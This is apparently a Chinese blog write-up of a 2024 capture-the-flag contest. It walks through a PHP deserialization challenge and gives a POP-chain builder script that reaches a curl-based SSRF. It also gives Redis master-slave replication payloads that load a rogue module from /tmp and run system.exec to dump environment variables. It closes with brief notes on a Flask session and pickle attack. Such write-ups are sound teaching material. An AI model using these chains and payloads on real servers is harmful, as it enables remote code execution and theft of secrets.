web1 - EZphp

题目源码不能一页展示完全差评

不然打pop时候很麻烦翻来翻去的

缩进后代码如下

<?php
highlight_file(__FILE__);
include "function.php";
class Rd{
    public $ending;
    public $cl;
    public $poc;
    public function __destruct(){
        echo "All matters have concluded"."</br>";}
    public function __call($name, $arg){
        foreach ($arg as $key => $value) {
            if ($arg[0]['POC'] == "0.o") {
                $this->cl->var1 = "get";}}}}

class Poc{
    public $payload;
    public $fun;
    public function __set($name, $value) {
        $this->payload = $name;
        $this->fun = $value;}
    function getflag($paylaod){
        echo "Have you genuinely accomplished what you set out to do?"."</br>";
        file_get_contents($paylaod);}}

class Er{
    public $symbol;
    public $Flag;
    public function __construct(){
        $this->symbol = True;}
    public function __set($name, $value){   
        if (preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',base64_decode($this->Flag))){
               $value($this->Flag);}else {
    echo "NoNoNo,please you can look hint.php"."</br>";}}}

class Ha{
    public $start;
    public $start1;
    public $start2;
    public function __construct(){
        echo $this->start1 . "__construct" . "</br>";}
    public function __destruct(){
        if ($this->start2 === "o.0") {
            $this->start1->Love($this->start);
            echo "You are Good!"."</br>";}}}

function get($url) {
    $url=base64_decode($url);
    var_dump($url);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $output = curl_exec($ch);
    $result_info = curl_getinfo($ch);
    var_dump($result_info);
    curl_close($ch);
    var_dump($output);}
    
if (isset($_POST['pop'])) {
    $a = unserialize($_POST['pop']);} else {
    die("You are Silly goose!");}
?>

POP链+SSRF

POP

pop这边不难，最后的$value($this->flag)通过__call把name=var1 value=get传递过来，利用外面的get函数打ssrf

$a=new Ha();
$a->start2="o.0";
$a->start1=new Rd();
$a->start=array("POC"=>"0.o");
$a->start1->cl=new Er();
$a->start1->cl->Flag="payload+base64";//到get(flag)  gopher://打ssrf
echo serialize($a);

SSRF

function get($url) {
    $url=base64_decode($url);
    var_dump($url);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $output = curl_exec($ch);
    $result_info = curl_getinfo($ch);
    var_dump($result_info);
    curl_close($ch);
    var_dump($output);}

$url 是刚才传入的 flag里面的payload，甚至没waf，应该是直接的ssrf

hint.php告诉是127地址

主从读取env 只能打tmp就主从

payload1 = '''
slaveof ip 21000
config set dir /tmp
config set dbfilename exp.so
quit
'''

payload2 = '''slaveof no one
module load /tmp/exp.so
system.exec 'env'
quit
'''

picup（unsolve）

如果能找到环境的话复现一下

flask session

然后app.secret_key=users.passwords[‘admin’]=hashlib.md5(os.urandom(32)).hexdigest()

读 proc self maps

pic打pickle

DoubleLi's Blog

I春秋2024冬

web1 - EZphp

POP

SSRF

picup（unsolve）